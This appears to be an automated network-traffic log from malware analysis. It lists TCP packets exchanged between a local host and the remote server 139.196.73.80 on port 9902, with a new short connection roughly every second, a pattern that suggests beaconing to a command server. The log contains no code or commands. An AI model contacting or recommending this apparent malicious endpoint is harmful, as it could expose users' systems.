Apr 17, 2024 07:08:07.522576094 CEST	9902	49791	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:07.523117065 CEST	49791	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:07.523626089 CEST	49791	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:07.871467113 CEST	9902	49791	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:07.874640942 CEST	9902	49791	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:07.874680996 CEST	9902	49791	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:07.874711037 CEST	49791	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:07.874747038 CEST	49791	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:07.874990940 CEST	49791	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:07.986835003 CEST	49792	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:08.210052013 CEST	9902	49791	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:08.312794924 CEST	9902	49792	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:08.313240051 CEST	49792	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:08.313241005 CEST	49792	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:09.001722097 CEST	49792	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:09.348124981 CEST	9902	49792	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:09.351041079 CEST	9902	49792	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:09.351083040 CEST	9902	49792	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:09.351310968 CEST	49792	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:09.351311922 CEST	49792	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:09.351656914 CEST	49792	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:09.455670118 CEST	49793	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:09.695466995 CEST	9902	49792	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:09.785264969 CEST	9902	49793	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:09.785404921 CEST	49793	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:09.785763025 CEST	49793	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:10.126763105 CEST	9902	49793	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:10.129580975 CEST	9902	49793	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:10.129621983 CEST	9902	49793	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:10.129767895 CEST	49793	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:10.129767895 CEST	49793	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:10.129859924 CEST	49793	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:10.236618996 CEST	49794	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:10.464318991 CEST	9902	49793	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:10.561177969 CEST	9902	49794	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:10.561505079 CEST	49794	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:10.561634064 CEST	49794	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:10.877327919 CEST	9902	49794	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:10.881982088 CEST	9902	49794	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:10.882086992 CEST	9902	49794	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:10.882231951 CEST	49794	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:10.882232904 CEST	49794	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:10.882325888 CEST	49794	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:10.986547947 CEST	49795	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:11.302273989 CEST	9902	49795	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:11.302412987 CEST	49795	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:11.302915096 CEST	49795	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:11.620661974 CEST	9902	49795	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:11.623888969 CEST	9902	49795	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:11.623929977 CEST	9902	49795	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:11.624239922 CEST	49795	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:11.624239922 CEST	49795	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:11.689337015 CEST	49794	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:11.738748074 CEST	49795	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:11.739206076 CEST	49796	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:12.013972998 CEST	9902	49794	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:12.054347038 CEST	9902	49795	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:12.055113077 CEST	9902	49796	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:12.055311918 CEST	49796	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:12.055413008 CEST	49796	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:12.371124029 CEST	9902	49796	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:12.374974966 CEST	9902	49796	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:12.375015974 CEST	9902	49796	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:12.375130892 CEST	49796	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:12.375130892 CEST	49796	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:12.375283003 CEST	49796	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:12.487536907 CEST	49797	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:12.690854073 CEST	9902	49796	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:12.690915108 CEST	9902	49796	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:12.691189051 CEST	49796	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:12.814690113 CEST	9902	49797	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:12.815047979 CEST	49797	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:12.815674067 CEST	49797	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:13.151163101 CEST	9902	49797	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:13.153424978 CEST	9902	49797	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:13.153465033 CEST	9902	49797	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:13.153511047 CEST	49797	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:13.153511047 CEST	49797	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:13.153879881 CEST	49797	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:13.268241882 CEST	49798	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:13.488495111 CEST	9902	49797	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:13.600544930 CEST	9902	49798	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:13.600703955 CEST	49798	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:13.600965023 CEST	49798	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:14.298609018 CEST	49798	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:15.282890081 CEST	49798	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:15.616200924 CEST	9902	49798	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:15.618978024 CEST	9902	49798	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:15.619036913 CEST	49798	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:15.619038105 CEST	9902	49798	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:15.619087934 CEST	49798	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:15.619467020 CEST	49798	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:15.722381115 CEST	49799	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:16.034612894 CEST	9902	49799	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:16.035054922 CEST	49799	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:16.035433054 CEST	49799	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:16.279151917 CEST	9902	49798	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:16.279227018 CEST	49798	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:16.348148108 CEST	9902	49799	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:16.350776911 CEST	9902	49799	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:16.350836039 CEST	49799	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:16.350837946 CEST	9902	49799	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:16.350888014 CEST	49799	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:16.351051092 CEST	49799	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:16.455625057 CEST	49800	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:16.663116932 CEST	9902	49799	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:16.792340040 CEST	9902	49800	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:16.792452097 CEST	49800	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:16.792721033 CEST	49800	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:17.116139889 CEST	9902	49800	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:17.119940042 CEST	9902	49800	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:17.120014906 CEST	9902	49800	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:17.120215893 CEST	49800	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:17.120376110 CEST	49800	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:17.236941099 CEST	49801	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:17.472661972 CEST	9902	49800	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:17.563308001 CEST	9902	49801	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:17.563513041 CEST	49801	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:17.563812971 CEST	49801	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:17.901936054 CEST	9902	49801	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:17.905805111 CEST	9902	49801	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:17.905874014 CEST	9902	49801	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:17.906219006 CEST	49801	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:17.906743050 CEST	49801	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:18.024683952 CEST	49802	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:18.232649088 CEST	9902	49801	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:18.347387075 CEST	9902	49802	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:18.347640038 CEST	49802	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:18.351878881 CEST	49802	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:18.665733099 CEST	9902	49802	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:18.668164968 CEST	9902	49802	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:18.668232918 CEST	9902	49802	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:18.668435097 CEST	49802	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:18.668672085 CEST	49802	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:18.784048080 CEST	49803	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:18.993344069 CEST	9902	49802	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:19.097054005 CEST	9902	49803	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:19.097157001 CEST	49803	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:19.097410917 CEST	49803	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:19.236376047 CEST	49798	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:19.413368940 CEST	9902	49803	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:19.415894985 CEST	9902	49803	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:19.415921926 CEST	9902	49803	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:19.416001081 CEST	49803	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:19.416002035 CEST	49803	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:19.416233063 CEST	49803	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:19.518136978 CEST	49804	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:19.569546938 CEST	9902	49798	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:19.729024887 CEST	9902	49803	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:19.834867001 CEST	9902	49804	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:19.835325956 CEST	49804	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:19.835592985 CEST	49804	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:20.152427912 CEST	9902	49804	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:20.155105114 CEST	9902	49804	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:20.155169010 CEST	9902	49804	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:20.155204058 CEST	49804	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:20.155242920 CEST	49804	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:20.155368090 CEST	49804	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:20.268163919 CEST	49805	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:20.473817110 CEST	9902	49804	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:20.588407040 CEST	9902	49805	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:20.588680983 CEST	49805	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:20.588931084 CEST	49805	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:21.267241001 CEST	49805	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:21.587168932 CEST	9902	49805	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:21.589632034 CEST	9902	49805	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:21.589663029 CEST	9902	49805	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:21.589699030 CEST	49805	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:21.589745045 CEST	49805	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:21.590787888 CEST	49805	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:21.706356049 CEST	49806	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:21.910062075 CEST	9902	49805	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:22.034307957 CEST	9902	49806	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:22.034452915 CEST	49806	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:22.034872055 CEST	49806	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:22.359878063 CEST	9902	49806	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:22.363482952 CEST	9902	49806	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:22.363578081 CEST	9902	49806	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:22.363804102 CEST	49806	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:22.363804102 CEST	49806	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:22.363953114 CEST	49806	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:22.471961021 CEST	49807	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:22.690713882 CEST	9902	49806	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:22.794464111 CEST	9902	49807	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:22.794900894 CEST	49807	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:22.795084000 CEST	49807	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:23.126457930 CEST	9902	49807	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:23.130312920 CEST	9902	49807	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:23.130347013 CEST	9902	49807	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:23.130506992 CEST	49807	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:23.132909060 CEST	49807	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:23.237060070 CEST	49808	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:23.450043917 CEST	9902	49807	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:23.560143948 CEST	9902	49808	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:23.562319040 CEST	49808	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:23.562464952 CEST	49808	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:24.251816034 CEST	49808	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:24.562216043 CEST	9902	49808	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:24.562349081 CEST	49808	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:24.580888033 CEST	9902	49808	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:24.583832026 CEST	9902	49808	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:24.583872080 CEST	9902	49808	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:24.583919048 CEST	49808	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:24.583962917 CEST	49808	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:25.670084000 CEST	49808	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:25.783706903 CEST	49809	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:26.012619019 CEST	9902	49808	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:26.116436005 CEST	9902	49809	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:26.116770983 CEST	49809	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:26.116771936 CEST	49809	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:26.444304943 CEST	9902	49809	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:26.448180914 CEST	9902	49809	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:26.448193073 CEST	9902	49809	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:26.448271036 CEST	49809	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:26.533945084 CEST	49809	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:26.643099070 CEST	49810	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:26.862659931 CEST	9902	49809	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:26.990724087 CEST	9902	49810	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:26.990838051 CEST	49810	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:27.039865971 CEST	49810	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:27.387842894 CEST	9902	49810	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:27.390350103 CEST	9902	49810	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:27.390392065 CEST	9902	49810	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:27.390607119 CEST	49810	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:27.390607119 CEST	49810	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:27.390665054 CEST	49810	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:27.502669096 CEST	49811	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:27.738358021 CEST	9902	49810	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:27.843205929 CEST	9902	49811	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:27.843638897 CEST	49811	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:27.843683958 CEST	49811	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:28.548763990 CEST	49811	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:28.889749050 CEST	9902	49811	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:28.892565012 CEST	9902	49811	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:28.892605066 CEST	9902	49811	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:28.892617941 CEST	49811	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:28.892647028 CEST	49811	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:28.892754078 CEST	49811	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:29.002340078 CEST	49812	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:29.322906017 CEST	9902	49812	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:29.323363066 CEST	49812	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:29.323446989 CEST	49812	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:29.643814087 CEST	9902	49812	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:29.646600008 CEST	9902	49812	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:29.646662951 CEST	9902	49812	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:29.647212029 CEST	49812	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:29.647212982 CEST	49812	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:29.752748966 CEST	49813	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:29.892513990 CEST	49811	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:29.972608089 CEST	9902	49812	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:30.093045950 CEST	9902	49813	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:30.093612909 CEST	49813	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:30.093612909 CEST	49813	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:30.798619986 CEST	49813	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:30.990417004 CEST	9902	49811	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:30.990609884 CEST	49811	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:31.495207071 CEST	9902	49813	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:31.495388985 CEST	49813	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:31.798664093 CEST	49813	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:31.892604113 CEST	49811	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:32.161967039 CEST	9902	49813	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:32.164465904 CEST	9902	49813	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:32.164508104 CEST	9902	49813	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:32.164674997 CEST	49813	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:32.164674997 CEST	49813	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:32.164777040 CEST	49813	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:32.268028975 CEST	49814	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:32.596414089 CEST	9902	49814	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:32.596518993 CEST	49814	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:32.596761942 CEST	49814	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:33.280479908 CEST	9902	49813	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:33.280597925 CEST	49813	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:33.282929897 CEST	49814	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:33.998670101 CEST	9902	49814	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:33.999093056 CEST	49814	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:34.142010927 CEST	9902	49811	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:34.142213106 CEST	49811	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:34.267338037 CEST	49814	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:35.512799025 CEST	9902	49813	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:35.512967110 CEST	49813	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:35.876702070 CEST	49813	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:35.892306089 CEST	49811	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:36.204811096 CEST	49814	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:36.235716105 CEST	9902	49813	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:36.245063066 CEST	9902	49811	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:36.553874016 CEST	9902	49814	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:36.557755947 CEST	9902	49814	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:36.557790041 CEST	9902	49814	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:36.557857990 CEST	49814	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:36.557857990 CEST	49814	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:36.558000088 CEST	49814	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:36.674838066 CEST	49815	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:36.900943041 CEST	9902	49814	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:36.990041018 CEST	9902	49815	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:36.990266085 CEST	49815	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:36.990442991 CEST	49815	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:37.305033922 CEST	9902	49815	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:37.307681084 CEST	9902	49815	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:37.307720900 CEST	9902	49815	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:37.307781935 CEST	49815	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:37.307781935 CEST	49815	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:37.307914019 CEST	49815	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:37.424715042 CEST	49816	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:37.624984026 CEST	9902	49815	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:37.757987022 CEST	9902	49816	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:37.758085966 CEST	49816	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:37.758291960 CEST	49816	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:38.088619947 CEST	9902	49816	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:38.091202021 CEST	9902	49816	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:38.091216087 CEST	9902	49816	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:38.091269970 CEST	49816	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:38.091419935 CEST	49816	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:38.091419935 CEST	49816	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:38.205365896 CEST	49817	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:38.421757936 CEST	9902	49816	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:38.521945000 CEST	9902	49817	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:38.522061110 CEST	49817	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:38.522274971 CEST	49817	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:38.837639093 CEST	9902	49817	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:38.840642929 CEST	9902	49817	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:38.840673923 CEST	9902	49817	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:38.840761900 CEST	49817	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:38.840931892 CEST	49817	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:38.840931892 CEST	49817	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:38.956295967 CEST	49818	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:39.156248093 CEST	9902	49817	139.196.73.80	192.168.2.4
